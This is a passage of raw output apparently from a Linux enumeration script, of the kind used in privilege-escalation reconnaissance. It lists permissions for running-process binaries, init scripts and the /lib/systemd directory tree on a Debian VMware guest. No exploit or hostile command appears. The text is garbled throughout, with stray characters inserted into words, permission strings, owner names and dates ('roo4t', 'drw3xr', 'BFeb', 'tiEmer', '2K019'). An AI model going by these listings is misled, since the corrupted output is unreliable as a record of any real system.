/lib/systemd/systemd-timesyncd 664K -rwxr-xr-x 1 root root 663K Aug 20 2019 /lib/systemd/systemd-udevd 64K -rwxr-xr-x 1 root root 64K Jan 10 2019 /sbin/agetty 0 1lrwxrwxrwx 1 root root 20 Aug 20 2019 /sbin/init -> /lib/systemd/systemd 236K -rwxr-xr-x 1 root root 236K Jun 9 2019 /usr/bin/dbus-daemon 0 lrwxrwxrwx 1 root root 37 Nov 12 2019 /usr/lib/vmware-vgauth/VGAuthService -> /usr/lib/vmware-tools/bin64/appLoader 72K -r-xr-xr-x 1 root bin 72K Oct 25 2019 /usr/local/sbin/nhttpd 56K -rwxr-xr-x 1 root root 55K Jun 23 2019 /usr/sbin/cron 792K -rwxr-xr-x 1 root root 789K Oct 6 2019 /usr/sbin/sshd 0 lrwxrwxrwx 1 root root 37 Nov 12 2019 /usr/sbin/vmtoolsd -> /usr/lib/vmware-tools/sbin64/vmtoolsd [-] /etc/init.d/ binary permissions: total 120 drwxr-xr-x 2 root root 4096 Nov 12 2019 . drwxr-xr-x 73 root root 4096 Nov 12 2019 .. -rwxr-xr-x 1 root root 3740 Mar 30 2019 apparmor -rwxr-xr-x 1 root root 1232 Mar 23 2019 console-setup.sh -rwxr-xr-x 1 root root 3059 Jun 23 2019 cron -rwxr-xr-x 1 root root 2813 Jun 9 2019 dbus -rwxr-xr-x 1 root root 3809 Jan 10 2019 hwclock.sh -rwxr-xr-x 1 root root 1479 Oc2t 29 2018 keyboard-setup.sh -rwxr-xr-x 1 root root 2044 Feb 9 2019 kmod -rwxr-xr-x 1 root root 1364 Oct 10 2018 netfilter-persistent -rwxr-xr-x 1 root root 4445 Aug 25 2018 networking -rwxr-xr-x 1 root root 924 May 31 2018 procps -rwxr-xr-x 1 root root 2864 Feb 26 2019 rsyslog -rwxr-xr-x 1 root root 3939 Oct 5 2019 ssh -rwxr-xr-x 1 root root 1030 Oct 12 2019 sudo -rwxr-xr-x 1 root root 6872 May 24 2019 udev -rwxr-xr-x 1 root root 45893 Nov 12 2019 vmware-tools [-] /lib/systemd/* config file permissions: /lib/systemd/: total 8.1M drwxr-xr-x 19 root root 36K Oct 25 2019 system drwxr-xr-x 3 root root 4.0K Oct 25 2019 user drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-sleep drwxr-xr-x 2 root root 4.0K Oct 25 2019 network drwxr-xr-x 2 root root 4.0K Oct 25 2019 catalog drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-generators drwxr-xr-x 2 root root 4.0K Oct 25 2019 system-preset drwxr-xr-x 2 root root 4.0K Oct 25 2019 user-environment-generators drw3xr-xr-x 2 root root 4.0K Oct 25 2019 user-preset drwxr-xr-x 3 root root 4.0K Oct 25 2019 boot -rw-r--r-- 1 root root 2.6M Aug 20 2019 libsystemd-shared-241.so -rwxr-xr-x 1 root root 1.5M Aug 20 2019 systemd -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-ac-power -rwxr-xr-x 1 root root 22K Aug 20 2019 systemd-backlight -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-binfmt -rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-bless-boot -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-boot-check-no-failures -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-cgroups-agent -rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-cryptsetup -rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-dissect -rwxr-xr-x 1 root root 26K Aug 20 2019 systemd-fsck -rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-fsckd -rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-growfs -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-hibernate-resume -rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-hostnamed -rwxr-xr-x 1 roo4t root 19K Aug 20 2019 systemd-initctl -rwxr-xr-x 1 root root 143K Aug 20 2019 systemd-journald -rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-localed -rwxr-xr-x 1 root root 227K Aug 20 2019 systemd-logind -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-makefs -rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-modules-load -rwxr-xr-x 1 root root 1.8M Aug 20 2019 systemd-networkd -rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-networkd-wait-online -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-quotacheck -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-random-seed -rwxr-xr-x 1 root root 19K Aug 20 2019 systemd-remount-fs -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-reply-password -rwxr-xr-x 1 root root 399K Aug 20 2019 systemd-resolved -rwxr-xr-x 1 root root 23K Aug 20 2019 systemd-rfkill -rwxr-xr-x 1 root root 51K Aug 20 2019 systemd-shutdown -rwxr-xr-x 1 root root 27K Aug 20 2019 systemd-sleep -rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-socket-proxyd -rwxr-xr-x 5 1 root root 14K Aug 20 2019 systemd-sulogin-shell -rwxr-xr-x 1 root root 23K Aug 20 2019 systemd-sysctl -rwxr-xr-x 1 root root 1.4K Aug 20 2019 systemd-sysv-install -rwxr-xr-x 1 root root 39K Aug 20 2019 systemd-timedated -rwxr-xr-x 1 root root 55K Aug 20 2019 systemd-timesyncd -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-time-wait-sync -rwxr-xr-x 1 root root 663K Aug 20 2019 systemd-udevd -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-update-utmp -rwxr-xr-x 1 root root 18K Aug 20 2019 systemd-user-runtime-dir -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-user-sessions -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-veritysetup -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-volatile-root drwxr-xr-x 2 root root 4.0K May 24 2019 system-shutdown drwxr-xr-x 2 root root 4.0K May 24 2019 user-generators -rw-r--r-- 1 root root 692 Feb 14 2019 resolv.conf /lib/systemd/system: total 744K drwxr-xr-x 2 root root 4.0K Oct 25 2019 multi-user.target.wants drwxr-xr-x 2 root r6oot 4.0K Oct 25 2019 sockets.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 sysinit.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 getty.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 graphical.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 local-fs.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 rescue.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 timers.target.wants drwxr-xr-x 2 root root 4.0K Oct 25 2019 rc-local.service.d drwxr-xr-x 2 root root 4.0K Oct 25 2019 systemd-resolved.service.d drwxr-xr-x 2 root root 4.0K Oct 25 2019 systemd-timesyncd.service.d drwxr-xr-x 2 root root 4.0K Oct 25 2019 user-.slice.d lrwxrwxrwx 1 root root 9 Oct 12 2019 sudo.service -> /dev/null -rw-r--r-- 1 root root 184 Oct 5 2019 rescue-ssh.target -rw-r--r-- 1 root root 538 Oct 5 2019 ssh.service -rw-r--r-- 1 root root 289 Oct 5 2019 ssh@.service -rw-r--r-- 1 root root 216 Oct 5 2019 ssh.socket lrwxrwxrwx 1 root root 14 Aug 20 2019 autovt@.service -> get7ty@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 bootlogs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 bootmisc.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 checkfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 checkroot-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 checkroot.service -> /dev/null -rw-r--r-- 1 root root 1.1K Aug 20 2019 console-getty.service -rw-r--r-- 1 root root 1.3K Aug 20 2019 container-getty@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 cryptdisks-early.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 cryptdisks.service -> /dev/null lrwxrwxrwx 1 root root 13 Aug 20 2019 ctrl-alt-del.target -> reboot.target lrwxrwxrwx 1 root root 25 Aug 20 2019 dbus-org.freedesktop.hostname1.service -> systemd-hostnamed.service lrwxrwxrwx 1 root root 23 Aug 20 2019 dbus-org.freedesktop.locale1.ser8vice -> systemd-localed.service lrwxrwxrwx 1 root root 22 Aug 20 2019 dbus-org.freedesktop.login1.service -> systemd-logind.service lrwxrwxrwx 1 root root 25 Aug 20 2019 dbus-org.freedesktop.timedate1.service -> systemd-timedated.service -rw-r--r-- 1 root root 1.1K Aug 20 2019 debug-shell.service lrwxrwxrwx 1 root root 16 Aug 20 2019 default.target -> graphical.target -rw-r--r-- 1 root root 797 Aug 20 2019 emergency.service -rw-r--r-- 1 root root 2.0K Aug 20 2019 getty@.service -rw-r--r-- 1 root root 342 Aug 20 2019 getty-static.service lrwxrwxrwx 1 root root 9 Aug 20 2019 halt.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 hostname.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 hwclock.service -> /dev/null -rw-r--r-- 1 root root 670 Aug 20 2019 initrd-cleanup.service -rw-r--r-- 1 root root 830 Aug 20 2019 initrd-parse-etc.service -rw-r--r-- 1 root root 589 Aug 20 2019 initrd-switch-root.service -rw-r--r-- 1 root root 704 Aug 20 9 2019 initrd-udevadm-cleanup-db.service lrwxrwxrwx 1 root root 9 Aug 20 2019 killprocs.service -> /dev/null lrwxrwxrwx 1 root root 28 Aug 20 2019 kmod.service -> systemd-modules-load.service -rw-r--r-- 1 root root 717 Aug 20 2019 kmod-static-nodes.service lrwxrwxrwx 1 root root 28 Aug 20 2019 module-init-tools.service -> systemd-modules-load.service lrwxrwxrwx 1 root root 9 Aug 20 2019 motd.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountall-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountall.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountdevsubfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountkernfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountnfs-bootclean.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 mountnfs.service -> /dev/null lrwxrwxrwx 1 root root 22 Aug 20 2019 procps.service -> systemd-sysctl.service -rw-r--r-- 1 root ro:ot 609 Aug 20 2019 quotaon.service -rw-r--r-- 1 root root 716 Aug 20 2019 rc-local.service lrwxrwxrwx 1 root root 16 Aug 20 2019 rc.local.service -> rc-local.service lrwxrwxrwx 1 root root 9 Aug 20 2019 rc.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 rcS.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 reboot.service -> /dev/null -rw-r--r-- 1 root root 788 Aug 20 2019 rescue.service lrwxrwxrwx 1 root root 9 Aug 20 2019 rmnologin.service -> /dev/null lrwxrwxrwx 1 root root 15 Aug 20 2019 runlevel0.target -> poweroff.target lrwxrwxrwx 1 root root 13 Aug 20 2019 runlevel1.target -> rescue.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel2.target -> multi-user.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel3.target -> multi-user.target lrwxrwxrwx 1 root root 17 Aug 20 2019 runlevel4.target -> multi-user.target lrwxrwxrwx 1 root root 16 Aug 20 2019 runlevel5.target -> graphical.target lrwxrwxrwx 1 root r;oot 13 Aug 20 2019 runlevel6.target -> reboot.target lrwxrwxrwx 1 root root 9 Aug 20 2019 sendsigs.service -> /dev/null -rw-r--r-- 1 root root 1.5K Aug 20 2019 serial-getty@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 single.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 stop-bootlogd.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 stop-bootlogd-single.service -> /dev/null -rw-r--r-- 1 root root 742 Aug 20 2019 systemd-ask-password-console.service -rw-r--r-- 1 root root 752 Aug 20 2019 systemd-ask-password-wall.service -rw-r--r-- 1 root root 752 Aug 20 2019 systemd-backlight@.service -rw-r--r-- 1 root root 1.1K Aug 20 2019 systemd-binfmt.service -rw-r--r-- 1 root root 678 Aug 20 2019 systemd-bless-boot.service -rw-r--r-- 1 root root 718 Aug 20 2019 systemd-boot-check-no-failures.service -rw-r--r-- 1 root root 551 Aug 20 2019 systemd-fsckd.service -rw-r--r-- 1 root root 540 Aug 20 2019 systemd-fsckd.socket -rw-r--r-- 1 root root 740 Ag 20 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 732 Aug 20 2019 systemd-tmpfiles-setup-dev.service -rw-r--r-- 1 root root 772 Aug 20 2019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 986 Aug 20 2019 systemd-udevd.service -rw-r--r-- 1 root root 863 Aug 20 2019 systemd-udev-settle.service -rw-r--r-- 1 root root 763 Aug 20 2019 systemd-udev-trigger.service -rw-r--r-- 1 root root 797 Aug 20 2019 systemd-update-utmp-runlevel.service -rw-r--r-- 1 root root 794 Aug 20 2019 systemd-update-utmp.service -rw-r--r-- 1 root root 628 Aug 20 2019 systemd-user-sessions.service -rw-r--r-- 1 root root 690 Aug 20 2019 systemd-volatile-root.service lrwxrwxrwx 1 root root 21 Aug 20 2019 udev.service -> systemd-udevd.service lrwxrwxrwx 1 root root 9 Aug 20 2019 umountfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 umountnfs.service -> /dev/null lrwxrwxrwx 1 root root 9 Aug 20 2019 umountroot.service -> /dev/null lrwxrwxrwx 1 root root 27 Aug ?20 2019 urandom.service -> systemd-random-seed.service -rw-r--r-- 1 root root 688 Aug 20 2019 user-runtime-dir@.service -rw-r--r-- 1 root root 729 Aug 20 2019 user@.service lrwxrwxrwx 1 root root 9 Aug 20 2019 x11-common.service -> /dev/null -rw-r--r-- 1 root root 316 Jun 23 2019 cron.service -rw-r--r-- 1 root root 380 Jun 9 2019 dbus.service -rw-r--r-- 1 root root 106 Jun 9 2019 dbus.socket -rw-r--r-- 1 root root 326 May 28 2019 apt-daily.service -rw-r--r-- 1 root root 156 May 28 2019 apt-daily.timer -rw-r--r-- 1 root root 389 May 28 2019 apt-daily-upgrade.service -rw-r--r-- 1 root root 184 May 28 2019 apt-daily-upgrade.timer drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel1.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel2.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel3.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel4.target.wants drwxr-xr-x 2 root root 4.0K May 24 2019 runlevel5.target.wants -rw-r--r-- 1 root root 1.2K Mar 30@ 2019 apparmor.service -rw-r--r-- 1 root root 435 Feb 26 2019 rsyslog.service -rw-r--r-- 1 root root 919 Feb 14 2019 basic.target -rw-r--r-- 1 root root 419 Feb 14 2019 bluetooth.target -rw-r--r-- 1 root root 455 Feb 14 2019 boot-complete.target -rw-r--r-- 1 root root 465 Feb 14 2019 cryptsetup-pre.target -rw-r--r-- 1 root root 412 Feb 14 2019 cryptsetup.target -rw-r--r-- 1 root root 750 Feb 14 2019 dev-hugepages.mount -rw-r--r-- 1 root root 665 Feb 14 2019 dev-mqueue.mount -rw-r--r-- 1 root root 471 Feb 14 2019 emergency.target -rw-r--r-- 1 root root 541 Feb 14 2019 exit.target -rw-r--r-- 1 root root 480 Feb 14 2019 final.target -rw-r--r-- 1 root root 506 Feb 14 2019 getty-pre.target -rw-r--r-- 1 root root 500 Feb 14 2019 getty.target -rw-r--r-- 1 root root 598 Feb 14 2019 graphical.target -rw-r--r-- 1 root root 527 Feb 14 2019 halt.target -rw-r--r-- 1 root root 509 Feb 14 2019 hibernate.target -rw-r--r-- 1 root root 530 Feb 14 2019 hybrid-sleep.target -rw-r--r-- 1 rootA root 593 Feb 14 2019 initrd-fs.target -rw-r--r-- 1 root root 561 Feb 14 2019 initrd-root-device.target -rw-r--r-- 1 root root 566 Feb 14 2019 initrd-root-fs.target -rw-r--r-- 1 root root 777 Feb 14 2019 initrd-switch-root.target -rw-r--r-- 1 root root 763 Feb 14 2019 initrd.target -rw-r--r-- 1 root root 541 Feb 14 2019 kexec.target -rw-r--r-- 1 root root 435 Feb 14 2019 local-fs-pre.target -rw-r--r-- 1 root root 547 Feb 14 2019 local-fs.target -rw-r--r-- 1 root root 445 Feb 14 2019 machine.slice -rw-r--r-- 1 root root 532 Feb 14 2019 multi-user.target -rw-r--r-- 1 root root 505 Feb 14 2019 network-online.target -rw-r--r-- 1 root root 502 Feb 14 2019 network-pre.target -rw-r--r-- 1 root root 521 Feb 14 2019 network.target -rw-r--r-- 1 root root 554 Feb 14 2019 nss-lookup.target -rw-r--r-- 1 root root 513 Feb 14 2019 nss-user-lookup.target -rw-r--r-- 1 root root 394 Feb 14 2019 paths.target -rw-r--r-- 1 root root 592 Feb 14 2019 poweroff.target -rw-r--r-- 1 root root 417 BFeb 14 2019 printer.target -rw-r--r-- 1 root root 745 Feb 14 2019 proc-sys-fs-binfmt_misc.automount -rw-r--r-- 1 root root 655 Feb 14 2019 proc-sys-fs-binfmt_misc.mount -rw-r--r-- 1 root root 583 Feb 14 2019 reboot.target -rw-r--r-- 1 root root 549 Feb 14 2019 remote-cryptsetup.target -rw-r--r-- 1 root root 436 Feb 14 2019 remote-fs-pre.target -rw-r--r-- 1 root root 522 Feb 14 2019 remote-fs.target -rw-r--r-- 1 root root 492 Feb 14 2019 rescue.target -rw-r--r-- 1 root root 540 Feb 14 2019 rpcbind.target -rw-r--r-- 1 root root 442 Feb 14 2019 shutdown.target -rw-r--r-- 1 root root 402 Feb 14 2019 sigpwr.target -rw-r--r-- 1 root root 460 Feb 14 2019 sleep.target -rw-r--r-- 1 root root 449 Feb 14 2019 slices.target -rw-r--r-- 1 root root 420 Feb 14 2019 smartcard.target -rw-r--r-- 1 root root 396 Feb 14 2019 sockets.target -rw-r--r-- 1 root root 420 Feb 14 2019 sound.target -rw-r--r-- 1 root root 503 Feb 14 2019 suspend.target -rw-r--r-- 1 root root 577 Feb 14 2019 suspend-Cthen-hibernate.target -rw-r--r-- 1 root root 393 Feb 14 2019 swap.target -rw-r--r-- 1 root root 795 Feb 14 2019 sys-fs-fuse-connections.mount -rw-r--r-- 1 root root 558 Feb 14 2019 sysinit.target -rw-r--r-- 1 root root 767 Feb 14 2019 sys-kernel-config.mount -rw-r--r-- 1 root root 710 Feb 14 2019 sys-kernel-debug.mount -rw-r--r-- 1 root root 1.4K Feb 14 2019 syslog.socket -rw-r--r-- 1 root root 722 Feb 14 2019 systemd-ask-password-console.path -rw-r--r-- 1 root root 650 Feb 14 2019 systemd-ask-password-wall.path -rw-r--r-- 1 root root 556 Feb 14 2019 systemd-exit.service -rw-r--r-- 1 root root 546 Feb 14 2019 systemd-initctl.socket -rw-r--r-- 1 root root 647 Feb 14 2019 systemd-journald-audit.socket -rw-r--r-- 1 root root 1.2K Feb 14 2019 systemd-journald-dev-log.socket -rw-r--r-- 1 root root 882 Feb 14 2019 systemd-journald.socket -rw-r--r-- 1 root root 631 Feb 14 2019 systemd-networkd.socket -rw-r--r-- 1 root root 556 Feb 14 2019 systemd-poweroff.service -rw-r--r-- 1 root rooDt 551 Feb 14 2019 systemd-reboot.service -rw-r--r-- 1 root root 726 Feb 14 2019 systemd-rfkill.socket -rw-r--r-- 1 root root 490 Feb 14 2019 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 635 Feb 14 2019 systemd-udevd-control.socket -rw-r--r-- 1 root root 610 Feb 14 2019 systemd-udevd-kernel.socket -rw-r--r-- 1 root root 1.4K Feb 14 2019 system-update-cleanup.service -rw-r--r-- 1 root root 543 Feb 14 2019 system-update-pre.target -rw-r--r-- 1 root root 617 Feb 14 2019 system-update.target -rw-r--r-- 1 root root 445 Feb 14 2019 timers.target -rw-r--r-- 1 root root 435 Feb 14 2019 time-sync.target -rw-r--r-- 1 root root 457 Feb 14 2019 umount.target -rw-r--r-- 1 root root 432 Feb 14 2019 user.slice -rw-r--r-- 1 root root 482 Feb 10 2019 man-db.service -rw-r--r-- 1 root root 164 Feb 10 2019 man-db.timer -rw-r--r-- 1 root root 440 Feb 8 2019 netfilter-persistent.service -rw-r--r-- 1 root root 151 Jan 10 2019 fstrim.service -rw-r--r-- 1 root root 170 Jan 10 2019 fstrim.tiEmer -rw-r--r-- 1 root root 695 Aug 28 2018 logrotate.service -rw-r--r-- 1 root root 442 Aug 25 2018 ifupdown-pre.service -rw-r--r-- 1 root root 279 Aug 25 2018 ifupdown-wait-online.service -rw-r--r-- 1 root root 552 Aug 25 2018 ifup@.service -rw-r--r-- 1 root root 643 Aug 25 2018 networking.service -rw-r--r-- 1 root root 192 Jan 4 2018 logrotate.timer -rw-r--r-- 1 root root 312 Oct 9 2016 console-setup.service -rw-r--r-- 1 root root 287 Oct 9 2016 keyboard-setup.service /lib/systemd/system/multi-user.target.wants: total 0 lrwxrwxrwx 1 root root 15 Aug 20 2019 getty.target -> ../getty.target lrwxrwxrwx 1 root root 33 Aug 20 2019 systemd-ask-password-wall.path -> ../systemd-ask-password-wall.path lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-logind.service -> ../systemd-logind.service lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-user-sessions.service -&gFt; ../systemd-user-sessions.service lrwxrwxrwx 1 root root 15 Jun 9 2019 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants: total 0 lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-initctl.socket -> ../systemd-initctl.socket lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-journald-audit.socket -> ../systemd-journald-audit.socket lrwxrwxrwx 1 root root 34 Aug 20 2019 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket lrwxrwxrwx 1 root root 26 Aug 20 2019 systemd-journald.socket -> ../systemd-journald.socket lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-udevd-control.socket -> ../systemd-udevd-control.socket lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket lrwxrwxrwx 1 root root 14 Jun 9 2019 dbus.socket -> ../dbus.socket /lib/systemd/system/sysinit.target.wants: total 0 lrwxrwxrwx 1 root root 20 Aug 20 2019 cryptsetup.target -> ../cryptsetup.target lrwxrwxrwx 1 root root 22 Aug 20G 2019 dev-hugepages.mount -> ../dev-hugepages.mount lrwxrwxrwx 1 root root 19 Aug 20 2019 dev-mqueue.mount -> ../dev-mqueue.mount lrwxrwxrwx 1 root root 28 Aug 20 2019 kmod-static-nodes.service -> ../kmod-static-nodes.service lrwxrwxrwx 1 root root 36 Aug 20 2019 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount lrwxrwxrwx 1 root root 32 Aug 20 2019 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount lrwxrwxrwx 1 root root 26 Aug 20 2019 sys-kernel-config.mount -> ../sys-kernel-config.mount lrwxrwxrwx 1 root root 25 Aug 20 2019 sys-kernel-debug.mount -> ../sys-kernel-debug.mount lrwxrwxrwx 1 root root 36 Aug 20 2019 systemd-ask-password-console.path -> ../systemd-ask-password-console.path lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-binfmt.service -> ../systemd-binfmt.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-hwdb-update.service -> ../systemd-hwdb-update.service lrwxrwxrwx 1 root root 27 Aug 20 2019 systemd-journalHd.service -> ../systemd-journald.service lrwxrwxrwx 1 root root 32 Aug 20 2019 systemd-journal-flush.service -> ../systemd-journal-flush.service lrwxrwxrwx 1 root root 36 Aug 20 2019 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-modules-load.service -> ../systemd-modules-load.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-random-seed.service -> ../systemd-random-seed.service lrwxrwxrwx 1 root root 25 Aug 20 2019 systemd-sysctl.service -> ../systemd-sysctl.service lrwxrwxrwx 1 root root 27 Aug 20 2019 systemd-sysusers.service -> ../systemd-sysusers.service lrwxrwxrwx 1 root root 37 Aug 20 2019 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service lrwxrwxrwx 1 root root 33 Aug 20 2019 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service lrwxrwxrwx 1 root root 24 Aug 20 2019 systemd-udevd.service -> ../systemd-udevd.service lrwxrwxrwx 1 root root 31 Aug I20 2019 systemd-udev-trigger.service -> ../systemd-udev-trigger.service lrwxrwxrwx 1 root root 30 Aug 20 2019 systemd-update-utmp.service -> ../systemd-update-utmp.service /lib/systemd/system/getty.target.wants: total 0 lrwxrwxrwx 1 root root 23 Aug 20 2019 getty-static.service -> ../getty-static.service /lib/systemd/system/graphical.target.wants: total 0 lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/local-fs.target.wants: total 0 lrwxrwxrwx 1 root root 29 Aug 20 2019 systemd-remount-fs.service -> ../systemd-remount-fs.service /lib/systemd/system/rescue.target.wants: total 0 lrwxrwxrwx 1 root root 39 Aug 20 2019 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service /lib/systemd/system/timers.target.wants: total 0 lrwxrwxrwx 1 root root 31 Aug 20 2019 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer /lib/systemd/system/rc-local.service.d: totJal 4.0K -rw-r--r-- 1 root root 290 Aug 20 2019 debian.conf /lib/systemd/system/systemd-resolved.service.d: total 4.0K -rw-r--r-- 1 root root 551 Aug 20 2019 resolvconf.conf /lib/systemd/system/systemd-timesyncd.service.d: total 4.0K -rw-r--r-- 1 root root 251 Aug 20 2019 disable-with-time-daemon.conf /lib/systemd/system/user-.slice.d: total 4.0K -rw-r--r-- 1 root root 486 Feb 14 2019 10-defaults.conf /lib/systemd/system/runlevel1.target.wants: total 0 /lib/systemd/system/runlevel2.target.wants: total 0 /lib/systemd/system/runlevel3.target.wants: total 0 /lib/systemd/system/runlevel4.target.wants: total 0 /lib/systemd/system/runlevel5.target.wants: total 0 /lib/systemd/user: total 76K drwxr-xr-x 2 root root 4.0K Oct 25 2019 graphical-session-pre.target.wants -rw-r--r-- 1 root root 287 Oct 5 2019 ssh-agent.service -rw-r--r-- 1 root root 546 Aug 20 2019 graphical-session-pre.target -rw-r--r-- 1 root root 657 Aug 20 2019 systemd-tmpfiles-clean.service -rw-r--r-- 1 root root 720 Aug 20 2K019 systemd-tmpfiles-setup.service -rw-r--r-- 1 root root 497 Feb 14 2019 basic.target -rw-r--r-- 1 root root 419 Feb 14 2019 bluetooth.target -rw-r--r-- 1 root root 454 Feb 14 2019 default.target -rw-r--r-- 1 root root 502 Feb 14 2019 exit.target -rw-r--r-- 1 root root 484 Feb 14 2019 graphical-session.target -rw-r--r-- 1 root root 394 Feb 14 2019 paths.target -rw-r--r-- 1 root root 417 Feb 14 2019 printer.target -rw-r--r-- 1 root root 442 Feb 14 2019 shutdown.target -rw-r--r-- 1 root root 420 Feb 14 2019 smartcard.target -rw-r--r-- 1 root root 396 Feb 14 2019 sockets.target -rw-r--r-- 1 root root 420 Feb 14 2019 sound.target -rw-r--r-- 1 root root 500 Feb 14 2019 systemd-exit.service -rw-r--r-- 1 root root 533 Feb 14 2019 systemd-tmpfiles-clean.timer -rw-r--r-- 1 root root 445 Feb 14 2019 timers.target /lib/systemd/user/graphical-session-pre.target.wants: total 0 lrwxrwxrwx 1 root root 20 Oct 6 2019 ssh-agent.service -> ../ssh-agent.service /lib/systemd/system-sleep: tLotal 4.0K -rwxr-xr-x 1 root root 92 Oct 26 2018 hdparm /lib/systemd/network: total 16K -rw-r--r-- 1 root root 645 Feb 14 2019 80-container-host0.network -rw-r--r-- 1 root root 718 Feb 14 2019 80-container-ve.network -rw-r--r-- 1 root root 704 Feb 14 2019 80-container-vz.network -rw-r--r-- 1 root root 417 Feb 14 2019 99-default.link /lib/systemd/catalog: total 156K -rw-r--r-- 1 root root 13K Aug 20 2019 systemd.be.catalog -rw-r--r-- 1 root root 9.8K Aug 20 2019 systemd.be@latin.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.bg.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.catalog -rw-r--r-- 1 root root 472 Aug 20 2019 systemd.de.catalog -rw-r--r-- 1 root root 13K Aug 20 2019 systemd.fr.catalog -rw-r--r-- 1 root root 11K Aug 20 2019 systemd.it.catalog -rw-r--r-- 1 root root 14K Aug 20 2019 systemd.pl.catalog -rw-r--r-- 1 root root 8.2K Aug 20 2019 systemd.pt_BR.catalog -rw-r--r-- 1 root root 20K Aug 20 2019 systemd.ru.catalog -rw-r--r-- 1 root root 7.2K Aug 20 2019M systemd.zh_CN.catalog -rw-r--r-- 1 root root 7.1K Aug 20 2019 systemd.zh_TW.catalog /lib/systemd/system-generators: total 268K -rwxr-xr-x 1 root root 14K Aug 20 2019 systemd-bless-boot-generator -rwxr-xr-x 1 root root 31K Aug 20 2019 systemd-cryptsetup-generator -rwxr-xr-x 1 root root 15K Aug 20 2019 systemd-debug-generator 